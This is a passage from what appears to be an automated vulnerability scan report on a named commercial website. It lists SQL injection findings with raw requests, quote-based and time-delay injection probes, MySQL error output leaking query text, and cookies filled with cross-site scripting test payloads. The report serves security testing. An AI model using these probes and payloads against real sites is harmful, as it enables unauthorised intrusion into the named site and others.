Cookie: JSESSIONID=5BFB6E485A4D0B2638C70D220E88195F; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:01:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=snbjsmmup643u5prig2lm65am2; path=/
Content-Length: 2238
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
grps.group_id = prj.groupId    
    where prj.project_page_url = 'Marketing_Articles'/Using_Targeted_Sales_Messages.html' OR prj.project_page_url = 'Marketing_Articles'/Using_Targeted_Sales_Messages.html/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'Marketing_Articles'/Using_Targeted_Sales_Messages.h' at line 5

Request 2

GET /ppc/Marketing_Articles''/Using_Targeted_Sales_Messages.html HTTP/1.1
Referer: http://www.insideup.com/marketingarticles.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=5BFB6E485A4D0B2638C70D220E88195F; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 04:01:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=tbq8fv5sshkf6pdm52b9vniu75; path=/
Content-Length: 134
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/Marketing_Articles''/Using_Targeted_Sales_Messages.html was not found on this server.</p>

1.6. http://www.insideup.com/ppc/Marketing_Articles/Using_Targeted_Sales_Messages.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/Marketing_Articles/Using_Targeted_Sales_Messages.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/Marketing_Articles/Using_Targeted_Sales_Messages.html' HTTP/1.1
Referer: http://www.insideup.com/marketingarticles.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=5BFB6E485A4D0B2638C70D220E88195F; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:01:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=sf2dss0mtbabam5vrk3vhocma2; path=/
Content-Length: 2238
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
grps.group_id = prj.groupId    
    where prj.project_page_url = 'Marketing_Articles/Using_Targeted_Sales_Messages.html'' OR prj.project_page_url = 'Marketing_Articles/Using_Targeted_Sales_Messages.html'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Marketing_Articles/Using_Targeted_Sales_Messages.html'/'
   union select prj.catId' at line 5

Request 2

GET /ppc/Marketing_Articles/Using_Targeted_Sales_Messages.html'' HTTP/1.1
Referer: http://www.insideup.com/marketingarticles.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=5BFB6E485A4D0B2638C70D220E88195F; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 04:01:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hoof7jtuchr4c065gvpkagqrh5; path=/
Content-Length: 134
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/Marketing_Articles/Using_Targeted_Sales_Messages.html'' was not found on this server.</p>

1.7. http://www.insideup.com/ppc/leadflow/bulo00/leadflow/bulo00/project.php [ca parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/leadflow/bulo00/project.php

Issue detail

The ca parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ca parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/leadflow/bulo00/project.php?ca' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; 